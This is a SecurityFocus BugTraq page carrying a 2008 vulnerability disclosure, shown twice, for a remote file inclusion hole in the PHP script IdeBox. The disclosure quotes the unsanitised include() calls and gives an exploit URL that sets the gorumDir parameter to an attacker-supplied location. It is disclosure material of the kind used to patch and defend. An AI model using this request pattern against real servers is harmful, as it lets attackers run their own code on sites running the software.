Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
IdeBox (include) Remote File Inclusion Vulnerability
Jun 25 2008 12:17PM
Ghost hacker (ghost-r00t hotmail com)
(1 replies)
##############################################################
IdeBox (include) Remote File Inclusion Vulnerability
##############################################################
[~] Found : Ghost Hacker
[~] Home page : www.Real-Hack.net
[~] Email : Ghost-r00t (at) Hotmail (dot) com [email concealed]
[~] Script : IdeBox
[~] Download Script : http://ideabox.phpoutsourcing.com/ideabox_1_1.tgz
=========================== [ Viva IslaM ] ==========================
Error ( include.php ) :
include("$gorumDir/generformlib_date.php");
include("$gorumDir/notification.php");
include("$gorumDir/zmail.php");
include("$ideaDir/user.php");
include("$ideaDir/globalsettings.php");
include("$ideaDir/init.php");
include("$ideaDir/idea.php");
include("$ideaDir/history.php");
include("$ideaDir/cord.php");
Exploit :
http://xxxx/[Path]/include.php?gorumDir=[EVIL]
=========================== [ Viva IslaM ] ==========================
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & v4 TeaM & Aseg-Rabe7 & Mr.JUVE
Mr.hope & Mr.MoSoS & $eLe & MR.SQL & .. [ gh0st10.wordpress.com ] ..
All Member Real Hack And All My Friends :)
##############################################################
Found By Ghost Hacker & My TeaM R-H
##############################################################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]
Re: IdeBox (include) Remote File Inclusion Vulnerability
Jun 25 2008 08:13PM
Vladimir '3APA3A' Dubrovin (3APA3A SECURITY NNOV RU)
Privacy Statement
Copyright 2009, SecurityFocus
##############################################################
IdeBox (include) Remote File Inclusion Vulnerability
##############################################################
[~] Found : Ghost Hacker
[~] Home page : www.Real-Hack.net
[~] Email : Ghost-r00t (at) Hotmail (dot) com [email concealed]
[~] Script : IdeBox
[~] Download Script : http://ideabox.phpoutsourcing.com/ideabox_1_1.tgz
=========================== [ Viva IslaM ] ==========================
Error ( include.php ) :
include("$gorumDir/generformlib_date.php");
include("$gorumDir/notification.php");
include("$gorumDir/zmail.php");
include("$ideaDir/user.php");
include("$ideaDir/globalsettings.php");
include("$ideaDir/init.php");
include("$ideaDir/idea.php");
include("$ideaDir/history.php");
include("$ideaDir/cord.php");
Exploit :
http://xxxx/[Path]/include.php?gorumDir=[EVIL]
=========================== [ Viva IslaM ] ==========================
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & v4 TeaM & Aseg-Rabe7 & Mr.JUVE
Mr.hope & Mr.MoSoS & $eLe & MR.SQL & .. [ gh0st10.wordpress.com ] ..
All Member Real Hack And All My Friends :)
##############################################################
Found By Ghost Hacker & My TeaM R-H
##############################################################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]